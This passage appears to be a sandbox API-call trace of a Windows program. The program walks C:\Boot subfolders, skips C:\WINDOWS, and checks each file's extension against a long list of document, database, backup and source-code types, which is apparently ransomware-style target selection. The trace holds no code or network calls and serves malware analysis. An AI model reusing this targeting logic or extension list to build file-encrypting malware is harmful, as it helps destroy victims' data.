dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.664] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef569843, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x327294d0, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x121a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.664] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0284.665] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0284.665] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0284.665] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.665] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0284.665] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.665] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947f68 [0284.838] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.838] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.839] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0284.839] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0284.839] FindClose (in: hFindFile=0x3947f68 | out: hFindFile=0x3947f68) returned 1 [0284.839] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.839] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-MX", cAlternateFileName="")) returned 1 [0284.839] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.839] FindFirstFileW (in: lpFileName="C:\\Boot\\es-MX\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39482e8 [0284.844] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.844] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.844] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0284.844] FindClose (in: hFindFile=0x39482e8 | out: hFindFile=0x39482e8) returned 1 [0284.844] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.844] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="et-EE", cAlternateFileName="")) returned 1 [0284.844] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.845] FindFirstFileW (in: lpFileName="C:\\Boot\\et-EE\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39481a8 [0284.845] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.845] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.845] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0284.845] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0284.845] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.846] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0284.846] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.846] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947c28 [0284.847] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.847] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.849] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0284.849] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0284.849] FindClose (in: hFindFile=0x3947c28 | out: hFindFile=0x3947c28) returned 1 [0284.850] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.850] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Fonts", cAlternateFileName="")) returned 1 [0284.850] lstrlenW (lpString="C:\\Boot\\Fonts") returned 13 [0284.850] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\Boot\\Fonts") returned 1 [0284.850] lstrlenW (lpString="Fonts") returned 5 [0284.850] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Fonts") returned -1 [0284.850] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.850] lstrlenW (lpString="C:\\Boot\\Fonts") returned 13 [0284.850] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948228 [0284.853] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.853] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef782dd9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x386467, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0284.854] lstrlenW (lpString="chs_boot.ttf") returned 12 [0284.854] lstrlenW (lpString=".1cd") returned 4 [0284.854] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0284.854] lstrlenW (lpString=".3ds") returned 4 [0284.854] lstrcmpiW (lpString1=".3ds", lpString2=".ttf") returned -1 [0284.854] lstrlenW (lpString=".3fr") returned 4 [0284.854] lstrcmpiW (lpString1=".3fr", lpString2=".ttf") returned -1 [0284.854] lstrlenW (lpString=".3g2") returned 4 [0284.854] lstrcmpiW (lpString1=".3g2", lpString2=".ttf") returned -1 [0284.854] lstrlenW (lpString=".3gp") returned 4 [0284.854] lstrcmpiW (lpString1=".3gp", lpString2=".ttf") returned -1 [0284.854] lstrlenW (lpString=".7z") returned 3 [0284.854] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0284.854] lstrlenW (lpString=".accda") returned 6 [0284.854] lstrcmpiW (lpString1=".accda", lpString2="ot.ttf") returned -1 [0284.854] lstrlenW (lpString=".accdb") returned 6 [0284.854] lstrcmpiW (lpString1=".accdb", lpString2="ot.ttf") returned -1 [0284.854] lstrlenW (lpString=".accdc") returned 6 [0284.854] lstrcmpiW (lpString1=".accdc", lpString2="ot.ttf") returned -1 [0284.854] lstrlenW (lpString=".accde") returned 6 [0284.854] lstrcmpiW (lpString1=".accde", lpString2="ot.ttf") returned -1 [0284.854] lstrlenW (lpString=".accdt") returned 6 [0284.854] lstrcmpiW (lpString1=".accdt", lpString2="ot.ttf") returned -1 [0284.854] lstrlenW (lpString=".accdw") returned 6 [0284.854] lstrcmpiW (lpString1=".accdw", lpString2="ot.ttf") returned -1 [0284.855] lstrlenW (lpString=".adb") returned 4 [0284.855] lstrcmpiW (lpString1=".adb", lpString2=".ttf") returned -1 [0284.855] lstrlenW (lpString=".adp") returned 4 [0284.855] lstrcmpiW (lpString1=".adp", lpString2=".ttf") returned -1 [0284.855] lstrlenW (lpString=".ai") returned 3 [0284.855] lstrcmpiW (lpString1=".ai", lpString2="ttf") returned -1 [0284.855] lstrlenW (lpString=".ai3") returned 4 [0284.855] lstrcmpiW (lpString1=".ai3", lpString2=".ttf") returned -1 [0284.855] lstrlenW (lpString=".ai4") returned 4 [0284.855] lstrcmpiW (lpString1=".ai4", lpString2=".ttf") returned -1 [0284.855] lstrlenW (lpString=".ai5") returned 4 [0284.855] lstrcmpiW (lpString1=".ai5", lpString2=".ttf") returned -1 [0284.855] lstrlenW (lpString=".ai6") returned 4 [0284.855] lstrcmpiW (lpString1=".ai6", lpString2=".ttf") returned -1 [0284.855] lstrlenW (lpString=".ai7") returned 4 [0284.855] lstrcmpiW (lpString1=".ai7", lpString2=".ttf") returned -1 [0284.855] lstrlenW (lpString=".ai8") returned 4 [0284.855] lstrcmpiW (lpString1=".ai8", lpString2=".ttf") returned -1 [0284.855] lstrlenW (lpString=".anim") returned 5 [0284.855] lstrcmpiW (lpString1=".anim", lpString2="t.ttf") returned -1 [0284.855] lstrlenW (lpString=".arw") returned 4 [0284.855] lstrcmpiW (lpString1=".arw", lpString2=".ttf") returned -1 [0284.855] lstrlenW (lpString=".as") returned 3 [0284.855] lstrcmpiW (lpString1=".as", lpString2="ttf") returned -1 [0284.855] lstrlenW (lpString=".asa") returned 4 [0284.855] lstrcmpiW (lpString1=".asa", lpString2=".ttf") returned -1 [0284.855] lstrlenW (lpString=".asc") returned 4 [0284.856] lstrcmpiW (lpString1=".asc", lpString2=".ttf") returned -1 [0284.856] lstrlenW (lpString=".ascx") returned 5 [0284.856] lstrcmpiW (lpString1=".ascx", lpString2="t.ttf") returned -1 [0284.856] lstrlenW (lpString=".asm") returned 4 [0284.856] lstrcmpiW (lpString1=".asm", lpString2=".ttf") returned -1 [0284.856] lstrlenW (lpString=".asmx") returned 5 [0284.856] lstrcmpiW (lpString1=".asmx", lpString2="t.ttf") returned -1 [0284.856] lstrlenW (lpString=".asp") returned 4 [0284.856] lstrcmpiW (lpString1=".asp", lpString2=".ttf") returned -1 [0284.856] lstrlenW (lpString=".aspx") returned 5 [0284.856] lstrcmpiW (lpString1=".aspx", lpString2="t.ttf") returned -1 [0284.856] lstrlenW (lpString=".asr") returned 4 [0284.856] lstrcmpiW (lpString1=".asr", lpString2=".ttf") returned -1 [0284.856] lstrlenW (lpString=".asx") returned 4 [0284.856] lstrcmpiW (lpString1=".asx", lpString2=".ttf") returned -1 [0284.856] lstrlenW (lpString=".avi") returned 4 [0284.856] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0284.856] lstrlenW (lpString=".avs") returned 4 [0284.856] lstrcmpiW (lpString1=".avs", lpString2=".ttf") returned -1 [0284.856] lstrlenW (lpString=".backup") returned 7 [0284.856] lstrcmpiW (lpString1=".backup", lpString2="oot.ttf") returned -1 [0284.856] lstrlenW (lpString=".bak") returned 4 [0284.856] lstrcmpiW (lpString1=".bak", lpString2=".ttf") returned -1 [0284.856] lstrlenW (lpString=".bay") returned 4 [0284.856] lstrcmpiW (lpString1=".bay", lpString2=".ttf") returned -1 [0284.856] lstrlenW (lpString=".bd") returned 3 [0284.856] lstrcmpiW (lpString1=".bd", lpString2="ttf") returned -1 [0284.857] lstrlenW (lpString=".bin") returned 4 [0284.857] lstrcmpiW (lpString1=".bin", lpString2=".ttf") returned -1 [0284.857] lstrlenW (lpString=".bmp") returned 4 [0284.857] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0284.857] lstrlenW (lpString=".bz2") returned 4 [0284.857] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0284.857] lstrlenW (lpString=".c") returned 2 [0284.857] lstrcmpiW (lpString1=".c", lpString2="tf") returned -1 [0284.857] lstrlenW (lpString=".cdr") returned 4 [0284.857] lstrcmpiW (lpString1=".cdr", lpString2=".ttf") returned -1 [0284.857] lstrlenW (lpString=".cer") returned 4 [0284.857] lstrcmpiW (lpString1=".cer", lpString2=".ttf") returned -1 [0284.857] lstrlenW (lpString=".cf") returned 3 [0284.857] lstrcmpiW (lpString1=".cf", lpString2="ttf") returned -1 [0284.857] lstrlenW (lpString=".cfc") returned 4 [0284.857] lstrcmpiW (lpString1=".cfc", lpString2=".ttf") returned -1 [0284.857] lstrlenW (lpString=".cfm") returned 4 [0284.857] lstrcmpiW (lpString1=".cfm", lpString2=".ttf") returned -1 [0284.857] lstrlenW (lpString=".cfml") returned 5 [0284.857] lstrcmpiW (lpString1=".cfml", lpString2="t.ttf") returned -1 [0284.857] lstrlenW (lpString=".cfu") returned 4 [0284.857] lstrcmpiW (lpString1=".cfu", lpString2=".ttf") returned -1 [0284.857] lstrlenW (lpString=".chm") returned 4 [0284.857] lstrcmpiW (lpString1=".chm", lpString2=".ttf") returned -1 [0284.857] lstrlenW (lpString=".cin") returned 4 [0284.857] lstrcmpiW (lpString1=".cin", lpString2=".ttf") returned -1 [0284.857] lstrlenW (lpString=".class") returned 6 [0284.858] lstrcmpiW (lpString1=".class", lpString2="ot.ttf") returned -1 [0284.858] lstrlenW (lpString=".clx") returned 4 [0284.858] lstrcmpiW (lpString1=".clx", lpString2=".ttf") returned -1 [0284.858] lstrlenW (lpString=".config") returned 7 [0284.858] lstrcmpiW (lpString1=".config", lpString2="oot.ttf") returned -1 [0284.858] lstrlenW (lpString=".cpp") returned 4 [0284.858] lstrcmpiW (lpString1=".cpp", lpString2=".ttf") returned -1 [0284.858] lstrlenW (lpString=".cr2") returned 4 [0284.858] lstrcmpiW (lpString1=".cr2", lpString2=".ttf") returned -1 [0284.858] lstrlenW (lpString=".crt") returned 4 [0284.858] lstrcmpiW (lpString1=".crt", lpString2=".ttf") returned -1 [0284.858] lstrlenW (lpString=".crw") returned 4 [0284.858] lstrcmpiW (lpString1=".crw", lpString2=".ttf") returned -1 [0284.858] lstrlenW (lpString=".cs") returned 3 [0284.858] lstrcmpiW (lpString1=".cs", lpString2="ttf") returned -1 [0284.858] lstrlenW (lpString=".css") returned 4 [0284.858] lstrcmpiW (lpString1=".css", lpString2=".ttf") returned -1 [0284.858] lstrlenW (lpString=".csv") returned 4 [0284.858] lstrcmpiW (lpString1=".csv", lpString2=".ttf") returned -1 [0284.858] lstrlenW (lpString=".cub") returned 4 [0284.858] lstrcmpiW (lpString1=".cub", lpString2=".ttf") returned -1 [0284.858] lstrlenW (lpString=".dae") returned 4 [0284.858] lstrcmpiW (lpString1=".dae", lpString2=".ttf") returned -1 [0284.858] lstrlenW (lpString=".dat") returned 4 [0284.858] lstrcmpiW (lpString1=".dat", lpString2=".ttf") returned -1 [0284.858] lstrlenW (lpString=".db") returned 3 [0284.859] lstrcmpiW (lpString1=".db", lpString2="ttf") returned -1 [0284.859] lstrlenW (lpString=".dbf") returned 4 [0284.859] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0284.859] lstrlenW (lpString=".dbx") returned 4 [0284.859] lstrcmpiW (lpString1=".dbx", lpString2=".ttf") returned -1 [0284.859] lstrlenW (lpString=".dc3") returned 4 [0284.859] lstrcmpiW (lpString1=".dc3", lpString2=".ttf") 